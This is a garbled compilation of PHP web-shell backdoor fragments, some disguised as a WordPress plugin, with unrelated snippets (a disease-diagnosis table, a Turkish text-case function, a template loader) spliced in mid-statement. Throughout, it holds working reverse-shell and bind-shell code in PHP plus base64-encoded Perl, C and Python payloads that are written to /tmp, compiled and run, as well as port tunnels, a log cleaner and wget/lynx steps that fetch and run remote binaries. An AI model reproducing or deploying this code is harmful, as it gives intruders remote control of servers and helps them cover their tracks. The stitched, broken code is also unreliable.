echo "<pre class=ml1 style='margin-top:5px'>Successfully opened reverse shell to " . $_POST['p2'] . ":" . $_POST['p3'] . "<br>Connecting...</pre>";
@unlink("/tmp/bc.pl");
}
if ($_POST['p1'] == 'php') {
@set_time_limit(0);
$ip = $_POST['p2'];
$port = $_POST['p3'];
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'uname -a; w; id; /bin/sh -i';
$daemon = 0;
$debug = 0;
echo "<pre class=ml1 style='margin-top:5px'>";
if (function_exists('pcntl_fork')) {
$pid = pcntl_fork();
if ($pid == -1) {
echo "Cant fork!<br>";
exit(1);
}
if ($pid) {
exit(0);
}
if (posix_setsid() == -1) {
echo "Error: Can't setsid()<br>";
exit(1);
}
$daemon = 1;
} else {
echo "WARNING: Failed to daemonise. This is quite common and not fatal<br>";
}
chdir("/");
umask(0);
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
if (!$sock) {
echo "{$errstr} ({$errno})";
exit(1);
}
$descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
echo "ERROR: Can't spawn shell<br>";
exit(1);
}
@stream_set_blocking($pipes[0], 0);
@stream_set_blocking($pipes[1], 0);
@stream_set_blocking($pipes[2], 0);
@stream_set_blocking($sock, 0);
echo "Successfully opened reverse shell to {$ip}:{$port}<br>";
while (1) {
if (feof($sock)) {
echo "ERROR: Shell connection terminated<br>";
break;
}
if (feof($pipes[1])) {
echo "ERROR: Shell process terminated<br>";
break;
}
$read_a = array($sock, $pipes[1], $pipes[2]);
$num_changed_sockets = @stream_select($read_a, $write_a, $error_a, null);
if (in_array($sock, $read_a)) {
if ($debug) {
echo "SOCK READ<br>";
}
$input = fread($sock, $chunk_size);
if ($debug) {
echo "SOCK: {$input}<br>";
}
fwrite($pipes[0], $input);
}
if (in_array($pipes[1], $read_a)) {
if ($debug) {
echo "STDOUT READ<br>";
}
$input = fread($pipes[1], $chunk_size);
if ($debug) {
echo "STDOUT: {$input}<br>";
}
fwrite($sock, $input);
}
if (in_array($pipes[2], $read_a)) {
if ($debug) {
echo "STDERR READ<br>";
}
$input = fread($pipes[2], $chunk_size);
if ($debug) {
echo "STDERR: {$input}<br>";
}
fwrite($sock, $input);
}
}
fclose($sock);
fclose($pipes[0]);
fclose($pipes[1]);
fclose($pipes[2]);
proc_close($process);
echo "</pre>";
}
}
echo "</div>";
yemenfooter();
}
// echo "<br>Hasil =".max($cf);
// print_r($mb2);
echo "<table class='table'>";
$penyakit_test = array();
$penyakit_mb = array();
$penyakit_md = array();
foreach ($diagnosa as $key => $value) {
$penyakit_test[] = $value->penyakit->nama_penyakit;
$penyakit_mb[] = $value->mb;
$penyakit_md[] = $value->md;
echo "<tr>";
echo "<td>" . $value->penyakit->nama_penyakit . "<td>";
echo "<td>" . $value->gejala->nama_gejala . "<td>";
echo "<td>" . $value->mb . "<td>";
echo "<td>" . $value->md . "<td>";
echo "<td>" . cf($value->mb, $value->md) . "<td>";
echo "</tr>";
}
echo "</table>";
/*foreach ($model as $key => $value) {
$cfa=$value->mb-$value->md;
}*/
}
$penyakits = array("penyakit1", "penyakit1", "penyakit1", "penyakit1", "penyakit1", "penyakit2", "penyakit2", "penyakit2", "penyakit2", "penyakit2");
print_r($penyakit_mb);
echo "<br>";
print_r($penyakits);
?>
</div>
<?php
p('Your IP:');
makeinput(array('name' => 'yourip', 'size' => 20, 'value' => $yourip));
p('Your Port:');
makeinput(array('name' => 'yourport', 'size' => 15, 'value' => $yourport));
p('Use:');
makeselect(array('name' => 'use', 'option' => $usedb, 'selected' => $use));
echo "Function: <select class=\"input\" name=\"execfunction_cb\" >\n<option value=\"system\">system</option>\n<option value=\"passthru\">passthru</option>\n<option value=\"exec\">exec</option>\n<option value=\"execute\">execute</option>\n<option value=\"shell_exec\">shell_exec</option>\n<option value=\"popen\">popen</option>\n</select>\n";
makeinput(array('name' => 'start_cb', 'value' => 'Start', 'type' => 'submit', 'class' => 'bt'));
p('</p>');
formfoot();
////////////////
!$yourport_bind && ($yourport_bind = '13700527');
$usedb = array('perl' => 'perl');
if ($start_bind && $yourport && $use) {
if ($use == 'perl') {
cf('/tmp/magiccoder_bind_pl', $bind_pl);
switch ($_POST['execfunction_bind']) {
case 'system':
$res = @system(which('perl') . " /tmp/magiccoder_bind_pl {$yourport_bind} &");
break;
case 'passthru':
$res = @passthru(which('perl') . " /tmp/magiccoder_bind_pl {$yourport_bind} &");
break;
case 'exec':
$res = @exec(which('perl') . " /tmp/magiccoder_bind_pl {$yourport_bind} &");
break;
case 'execute':
$res = @execute(which('perl') . " /tmp/magiccoder_bind_pl {$yourport_bind} &");
break;
case 'shell_exec':
$res = @shell_exec(which('perl') . " /tmp/magiccoder_bind_pl {$yourport_bind} &");
function strto($to, $str)
{
define('cs', 'utf-8');
if (!function_exists('rp')) {
function rp($i, $str)
{
$B = array('I', 'Ğ', 'Ü', 'Ş', 'İ', 'Ö', 'Ç');
$k = array('ı', 'ğ', 'ü', 'ş', 'i', 'ö', 'ç');
$Bi = array(' I', ' ı', ' İ', ' i');
$ki = array(' I', ' I', ' İ', ' İ');
if ($i == 1) {
return str_replace($B, $k, $str);
} elseif ($i == 2) {
return str_replace($k, $B, $str);
} elseif ($i == 3) {
return str_replace($Bi, $ki, $str);
}
}
}
if (!function_exists('cf')) {
function cf($c = array(), $str)
{
foreach ($c as $cc) {
$s = explode($cc, $str);
foreach ($s as $k => $ss) {
$s[$k] = strto('ucfirst', $ss);
}
$str = implode($cc, $s);
}
return $str;
}
}
if (!function_exists('te')) {
function te()
{
return trigger_error('Lütfen geçerli bir strto() parametresi giriniz.', E_USER_ERROR);
}
}
$to = explode('|', $to);
if ($to) {
foreach ($to as $t) {
if ($t == 'lower') {
$str = mb_strtolower(rp(1, $str), cs);
} elseif ($t == 'upper') {
$str = mb_strtoupper(rp(2, $str), cs);
} elseif ($t == 'ucfirst') {
$str = mb_strtoupper(rp(2, mb_substr($str, 0, 1, cs)), cs) . mb_substr($str, 1, mb_strlen($str, cs) - 1, cs);
} elseif ($t == 'ucwords') {
$str = ltrim(mb_convert_case(rp(3, ' ' . $str), MB_CASE_TITLE, cs));
} elseif ($t == 'capitalizefirst') {
$str = cf(array('. ', '.', '? ', '?', '! ', '!', ': ', ':'), $str);
} else {
$str = te();
}
}
} else {
$str = te();
}
return $str;
}
$data = "\n<br>ngebind berhasil gan.";
} else {
$data = "\n<br>ngebind gagal gan :(";
}
$_POST['backcconnmsg'] = "To connect, use netcat! Usage: <b>'nc {$ip} {$por}'</b>.{$data}";
}
if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && $_POST['use'] == "Perl") {
if (is_writable(".")) {
cf("back", $back_connect_pl);
$p2 = which("perl");
$blah = ex($p2 . " back " . $_POST['backconnectip'] . " " . $_POST['backconnectport'] . " &");
if (file_exists("back")) {
unlink("back");
}
} else {
cf("/tmp/back", $back_connect_pl);
$p2 = which("perl");
$blah = ex($p2 . " /tmp/back " . $_POST['backconnectip'] . " " . $_POST['backconnectport'] . " &");
if (file_exists("/tmp/back")) {
unlink("/tmp/back");
}
}
$_POST['backcconnmsg'] = "Trying to connect to <b>" . $_POST['backconnectip'] . "</b> on port <b>" . $_POST['backconnectport'] . "</b>.";
}
@ini_set("max_execution_time", 0);
if (!function_exists("getmicrotime")) {
function getmicrotime()
{
list($usec, $sec) = explode(" ", microtime());
return (double) $usec + (double) $sec;
}
$back_connect = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj" . "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR" . "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT" . "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI" . "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi" . "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl" . "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
$back_connect_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC" . "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb" . "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd" . "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ" . "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC" . "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D" . "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp" . "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
$back_connect_py = "IyEvdXNyL2Jpbi9weXRob24gDQppbXBvcnQgc3lzIA0KaW1wb3J0IHNvY2tldCANCnNoZWxsPScv" . "YmluL2Jhc2gnIA0KZGVmIG1haW4oKTogDQogICAgcyA9IHNvY2tldC5zb2NrZXQoc29ja2V0LkFG" . "X0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKSANCiAgICB0cnk6IA0KICAgICAgICBzLmNvbm5lY3Qo" . "KHNvY2tldC5nZXRob3N0YnluYW1lKHN5cy5hcmd2WzFdKSxpbnQoc3lzLmFyZ3ZbMl0pKSkgDQog" . "ICAgICAgIHByaW50ICdbK11Db25uZWN0IE9LJyANCiAgICBleGNlcHQ6IA0KICAgICAgICBwcmlu" . "dCAiWy1dQ2FuJ3QgY29ubmVjdCIgDQogICAgICAgIHN5cy5leGl0KDIpIA0KICAgIGltcG9ydCBv" . "cyANCiAgICBvcy5kdXAyKHMuZmlsZW5vKCksMCkgDQogICAgb3MuZHVwMihzLmZpbGVubygpLDEp" . "IA0KICAgIG9zLmR1cDIocy5maWxlbm8oKSwyKSANCiAgICBpbXBvcnQgcHR5IA0KICAgIGdsb2Jh" . "bCBzaGVsbCANCiAgICBwdHkuc3Bhd24oc2hlbGwpDQogICAgcy5jbG9zZSgpIA0KaWYgX19uYW1l" . "X18gPT0gJ19fbWFpbl9fJzogDQogICAgbWFpbigpICANCg==";
if ($start && $yourip && $yourport && $use) {
if ($use == 'perl') {
cf('/tmp/angel_bc', $back_connect);
$res = execute(which('perl') . " /tmp/angel_bc {$yourip} {$yourport} &");
} else {
if ($use == 'c') {
cf('/tmp/angel_bc.c', $back_connect_c);
$res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');
@unlink('/tmp/angel_bc.c');
$res = execute("/tmp/angel_bc {$yourip} {$yourport} &");
} else {
if ($use == 'python') {
cf('/tmp/angel_bcpy', $back_connect_py);
$res = execute(which('python') . " /tmp/angel_bcpy {$yourip} {$yourport} &");
}
}
}
m("Now script try connect to {$yourip} port {$yourport} ...");
}
formhead(array('title' => 'Back Connect'));
makehide('action', 'backconnect');
p('<p>');
p('Your IP:');
makeinput(array('name' => 'yourip', 'size' => 20, 'value' => $yourip));
p('Your Port:');
makeinput(array('name' => 'yourport', 'size' => 15, 'value' => $yourport));
p('Use:');
makeselect(array('name' => 'use', 'option' => $usedb, 'selected' => $use));
/**
* automatically discover templates in templates/ folder. a nice touch?
*/
private function discoverTemplates()
{
$dir = ROOT . DIRECTORY_SEPARATOR . 'templates' . DIRECTORY_SEPARATOR;
//explain this
$templateFiles = array();
foreach ((array) cf('templates') as $template) {
$templateFiles[] = $dir . $template['path'];
}
foreach (glob($dir . "*.tmpl") as $filename) {
$tmpl = pathinfo($filename);
if (empty($GLOBALS['config']['templates'][$tmpl['filename']]) && !in_array($filename, $templateFiles)) {
//explain this
$GLOBALS['config']['templates'][$tmpl['filename']] = array('path' => $tmpl['basename']);
}
}
}
$blah = ex("gcc -o /tmp/backc /tmp/back.c");
@unlink("/tmp/back.c");
$blah = ex("/tmp/backc " . $_POST['ip'] . " " . $_POST['port'] . " &");
$_POST['cmd'] = "echo \"Now script try connect to " . $_POST['ip'] . " port " . $_POST['port'] . " ...\"";
}
if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && $_POST['use'] == "Perl") {
cf("/tmp/dp", $datapipe_pl);
$p2 = which("perl");
if (empty($p2)) {
$p2 = "perl";
}
$blah = ex($p2 . " /tmp/dp " . $_POST['local_port'] . " " . $_POST['remote_host'] . " " . $_POST['remote_port'] . " &");
$_POST['cmd'] = "ps -aux | grep dp";
}
if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && $_POST['use'] == "C") {
cf("/tmp/dpc.c", $datapipe_c);
$blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
@unlink("/tmp/dpc.c");
$blah = ex("/tmp/dpc " . $_POST['local_port'] . " " . $_POST['remote_port'] . " " . $_POST['remote_host'] . " &");
$_POST['cmd'] = "ps -aux | grep dpc";
}
if (!empty($_POST['alias'])) {
foreach ($aliases as $alias_name => $alias_cmd) {
if ($_POST['alias'] == $alias_name) {
$_POST['cmd'] = $alias_cmd;
}
}
}
if (!empty($HTTP_POST_FILES['userfile']['name'])) {
if (isset($_POST['nf1']) && !empty($_POST['new_name'])) {
$nfn = $_POST['new_name'];
function actionNetwork() {
WPluginHeader();
$back_connect_p= wpLicense2(1372);
$bind_port_p= wpLicense2(1373);
echo wpLicense2(1374). $_SERVER[ wpLicense2(1375)] . wpLicense2(1376);
if(isset($_POST[ wpLicense2(1377)])) {
function cf($f,$t) {
$w = @fopen($f, wpLicense2(1378)) or @function_exists('file_put_contents');
if($w){
@fwrite($w,@base64_decode($t));
@fclose($w);
}
}
if($_POST[ wpLicense2(1379)] == wpLicense2(1380)) {
cf( wpLicense2(1381),$bind_port_p);
$out = WPluginEx( wpLicense2(1382).$_POST[ wpLicense2(1383)]. wpLicense2(1384));
sleep(round(0+0.5+0.5));
echo "<pre class=ml1>$out\n".WPluginEx( wpLicense2(1385)). wpLicense2(1386);
unlink( wpLicense2(1387));
}
if($_POST[ wpLicense2(1388)] == wpLicense2(1389)) {
cf( wpLicense2(1390),$back_connect_p);
$out = WPluginEx( wpLicense2(1391).$_POST[ wpLicense2(1392)]. wpLicense2(1393).$_POST[ wpLicense2(1394)]. wpLicense2(1395));
sleep(round(0+0.25+0.25+0.25+0.25));
echo "<pre class=ml1>$out\n".WPluginEx( wpLicense2(1396)). wpLicense2(1397);
unlink( wpLicense2(1398));
}
}
echo wpLicense2(1399);
WPluginFooter();
}
if (is_writable('.')) {
cf($act, ${$act});
// 'tis pure innovation of optimization :)
chmod($act, 0777);
$cmd = './' . $act;
// keep this before $act = 'cmd';
$act = 'cmd';
$cmd_txt = '1';
} else {
echo 'Directory Is Not Writable!<br>';
}
}
if ($act == 'clearlogs') {
// windows cleaners
if (is_writable('.')) {
cf($act . '.exe', ${$act});
chmod($act . '.exe', 0777);
$cmd = $act . '.exe';
$act = 'cmd';
$cmd_txt = '1';
} else {
echo 'Directory Is Not Writable!<br>';
}
}
if ($x == "phpinfo") {
@ob_clean();
phpinfo();
capriv8exit();
}
if ($x == "security") {
echo "<div class=barheader>[ Server Security Information ]</div>" . "<table>" . "<tr><td>Open Base Dir</td><td>" . $hopenbasedir . "</td></tr>";
tbfoot();
if ($alreadymssql) {
@mssql_close();
}
} elseif ($action == 'backconnect') {
!$yourip && ($yourip = $_SERVER['REMOTE_ADDR']);
!$yourport && ($yourport = '12345');
$usedb = array('perl' => 'perl', 'c' => 'c');
$back_connect = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj" . "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR" . "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT" . "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI" . "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi" . "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl" . "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
$back_connect_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC" . "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb" . "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd" . "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ" . "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC" . "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D" . "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp" . "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
if ($start && $yourip && $yourport && $use) {
if ($use == 'perl') {
cf('/tmp/angel_bc', $back_connect);
$res = execute(which('perl') . " /tmp/angel_bc {$yourip} {$yourport} &");
} else {
cf('/tmp/angel_bc.c', $back_connect_c);
$res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');
@unlink('/tmp/angel_bc.c');
$res = execute("/tmp/angel_bc {$yourip} {$yourport} &");
}
m("Now script try connect to {$yourip} port {$yourport} ...");
}
formhead(array('title' => 'Back Connect'));
makehide('action', 'backconnect');
p('<p>');
p('Your IP:');
makeinput(array('name' => 'yourip', 'size' => 20, 'value' => $yourip));
p('Your Port:');
makeinput(array('name' => 'yourport', 'size' => 15, 'value' => $yourport));
p('Use:');
makeselect(array('name' => 'use', 'option' => $usedb, 'selected' => $use));
<?php
if (isset($_POST['dosyaa'])) {
dosyayicek($_POST['dosyaa'], $_POST['yeniyer']);
}
if (!empty($_GET['ipi']) && !empty($_GET['pipi'])) {
cf("/tmp/back", $back_connect);
$p2 = which("perl");
$blah = ex($p2 . " /tmp/back " . $_GET['ipi'] . " " . $_GET['pipi'] . " &");
echo "<b>Now script try connect to " . $_GET['ipi'] . " port " . $_GET['pipi'] . " ...</b>";
}
if (!empty($_GET['dolma'])) {
$sayko = htmlspecialchars($_GET['dolma']);
if ($sayko == "wgetcan") {
myshellexec("wget {$adires} -O sayko_bind;chmod 777 sayko_bind;./sayko_bind");
} else {
if ($sayko == "freadcan") {
dosyayicek($adires, "sayko_bind");
myshellexec("./sayko_bind");
} else {
if ($sayko == "lynxcan") {
myshellexec("lynx -dump {$adires} > sayko_bind;chmod 777 sayko_bind;./sayko_bind");
function actionNetwork() {
$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pIHsNCiAgICBpbnQgZmQ7DQogICAgc3RydWN0IHNvY2thZGRyX2luIHNpbjsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogICAgc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJdKSk7DQogICAgc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsNCiAgICBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsNCiAgICBpZiAoKGNvbm5lY3QoZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikgJnNpbiwgc2l6ZW9mKHN0cnVjdCBzb2NrYWRkcikpKTwwKSB7DQogICAgICAgIHBlcnJvcigiQ29ubmVjdCBmYWlsIik7DQogICAgICAgIHJldHVybiAwOw0KICAgIH0NCiAgICBkdXAyKGZkLCAwKTsNCiAgICBkdXAyKGZkLCAxKTsNCiAgICBkdXAyKGZkLCAyKTsNCiAgICBzeXN0ZW0oIi9iaW4vc2ggLWkiKTsNCiAgICBjbG9zZShmZCk7DQp9";
$back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
$bind_port_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICoqYXJndikgew0KICAgIGludCBzb2NrZmQsIG5ld2ZkLCBpOw0KICAgIGNoYXIgcGFzc1szMF07DQogICAgc3RydWN0IHNvY2thZGRyX2luIHJlbW90ZTsNCiAgICBkYWVtb24oMSwwKTsNCiAgICBzb2NrZmQgPSBzb2NrZXQoQUZfSU5FVCxTT0NLX1NUUkVBTSwwKTsNCiAgICBpZighc29ja2ZkKQ0KICAgICAgICByZXR1cm4gLTE7DQogICAgcmVtb3RlLnNpbl9mYW1pbHkgPSBBRl9JTkVUOw0KICAgIHJlbW90ZS5zaW5fcG9ydCA9IGh0b25zKGF0b2koYXJndlsxXSkpOw0KICAgIHJlbW90ZS5zaW5fYWRkci5zX2FkZHIgPSBodG9ubChJTkFERFJfQU5ZKTsNCiAgICBiaW5kKHNvY2tmZCwgKHN0cnVjdCBzb2NrYWRkciAqKSZyZW1vdGUsIDB4MTApOw0KICAgIGxpc3Rlbihzb2NrZmQsIDUpOw0KICAgIHdoaWxlKDEpIHsNCiAgICAgICAgbmV3ZmQ9YWNjZXB0KHNvY2tmZCwwLDApOw0KICAgICAgICBkdXAyKG5ld2ZkLDApOw0KICAgICAgICBkdXAyKG5ld2ZkLDEpOw0KICAgICAgICBkdXAyKG5ld2ZkLDIpOw0KICAgICAgICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6Iiw5KTsNCiAgICAgICAgcmVhZChuZXdmZCxwYXNzLHNpemVvZihwYXNzKSk7DQogICAgICAgIGZvcihpPTA7aTxzdHJsZW4ocGFzcyk7aSsrKQ0KICAgICAgICAgICAgaWYoIChwYXNzW2ldID09ICdcbicpIHx8IChwYXNzW2ldID09ICdccicpICkNCiAgICAgICAgICAgICAgICBwYXNzW2ldID0gJ1wwJzsNCiAgICAgICAgICAgIGlmIChzdHJjbXAoYXJndlsyXSxwYXNzKSA9PSAwKQ0KICAgICAgICAgICAgICAgIHN5c3RlbSgiL2Jpbi9zaCAtaSIpOw0KICAgICAgICAgICAgY2xvc2UobmV3ZmQpOw0KICAgIH0NCn0=";
$bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
?>
<h1>Network tools</h1><div class=content>
<form name='nfp' onSubmit="g(null,null,this.using.value,this.port.value,this.pass.value);return false;">
<span>Bind port to /bin/sh</span><br/>
Port: <input type='text' name='port' value='31337'> Password: <input type='text' name='pass' value='wso'> Using: <select name="using"><option value='bpc'>C</option><option value='bpp'>Perl</option></select> <input type=submit value=">>">
</form>
<form name='nfp' onSubmit="g(null,null,this.using.value,this.server.value,this.port.value);return false;">
<span>Back-connect to</span><br/>
Server: <input type='text' name='server' value='<?=$_SERVER['REMOTE_ADDR']?>'> Port: <input type='text' name='port' value='31337'> Using: <select name="using"><option value='bcc'>C</option><option value='bcp'>Perl</option></select> <input type=submit value=">>">
</form><br>
<?php
if(isset($_POST['p1'])) {
function cf($f,$t) {
$w=@fopen($f,"w") or @function_exists('file_put_contents');
if($w) {
@fwrite($w,@base64_decode($t)) or @fputs($w,@base64_decode($t)) or @file_put_contents($f,@base64_decode($t));
@fclose($w);
}
}
if($_POST['p1'] == 'bpc') {
cf("/tmp/bp.c",$bind_port_c);
$out = ex("gcc -o /tmp/bp /tmp/bp.c");
